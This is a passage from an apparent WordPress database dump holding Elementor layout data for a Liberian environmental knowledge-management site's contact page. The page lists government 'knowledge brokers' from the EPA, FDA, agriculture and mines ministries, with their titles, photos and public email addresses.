href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24665,3649,'_elementor_edit_mode','builder'),(24666,3649,'_elementor_template_type','wp-page'),(24667,3649,'_elementor_version','3.0.16'),(24668,3649,'_wp_page_template','default'),(24669,3649,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a 